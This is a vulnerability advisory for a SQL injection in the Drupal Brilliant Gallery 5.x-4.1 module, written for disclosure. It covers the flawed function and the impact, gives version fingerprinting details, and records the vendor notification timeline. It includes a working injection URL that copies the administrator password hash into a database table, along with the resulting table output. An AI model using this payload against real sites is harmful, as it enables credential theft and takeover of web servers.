Drupal Brilliant Gallery 5.x-4.1 SQL Injection Vulnerability

30 November -0001

Description

Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security.

The Brilliant module (http://drupal.org/project/brilliant_gallery), created by Vacilanda (http://www.vacilando.org/) is designed to allow users to easily create dynamic picture galleries by uploading images directly to a server and including code directly within nodes to display the gallery. The critical flaw exists within the brilliant_gallery_checklist_save() function (lines 109-129 of briliant_gallery.module). This function accepts three parameters ($nid,$qid, and $state), all of which can be manipulated via a properly crafted URL (defined by a callback in brilliant_gallery_menu() on line 307 of brilliant_gallery.module) These parameters are then used to craft SQL injections via remote URL request.

5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable

Testing for Vulnerability

Calling the URL:

http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from users where uid=1),3),(4,4,4,'4

will cause the administrator password to be inserted into the brilliant_gallery_checklist table in the Drupal database:

mysql> select * from brilliant_gallery_checklist;

+-----+------+----------------------------------+-------+
| nid | user | qid                              | state |
+-----+------+----------------------------------+-------+
|   2 |    0 | 2                                |     2 |
|   3 |    3 | 4202a5f87b68583e2eaaa6922c8c38d1 |     3 |
|   4 |    4 | 4                                |     4 |
+-----+------+----------------------------------+-------+

Impact

Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise since the administrator can configure file uploads and alter any content on the Drupal installation.

Determining Version

The brilliant_gallery.info page for vulnerable versions displays the following information:

; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $
name = Brilliant Gallery
description = Creates a fully customizable table gallery of
quality-scaled images from a pre-defined folder.
dependencies = lightbox2 colorpicker
package = Media

; Information added by drupal.org packaging script on 2008-05-05
version = "5.x-3.1"
project = "brilliant_gallery"
datestamp = "1210030204"


; Information added by drupal.org packaging script on 2008-07-17
version = "5.x-4.1"
project = "brilliant_gallery"
datestamp = "1216327204"

Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214).

Vendor Response

Drupal security team contacted via e-mail September 19, 2008. Vendor contacted September 19, 2008 via contact form submission at http://www.vacilando.eu/contact. Vulnerability announcement should be available at http://drupal.org/security by Wednesday, September 24, 2008. No details about patch release are available at this time.